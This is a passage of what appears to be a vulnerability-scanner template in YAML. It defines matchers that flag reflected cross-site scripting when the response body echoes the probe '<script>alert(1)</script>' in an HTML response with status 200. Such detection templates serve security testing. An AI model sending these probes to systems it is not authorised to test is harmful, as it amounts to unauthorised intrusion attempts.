16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(1)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------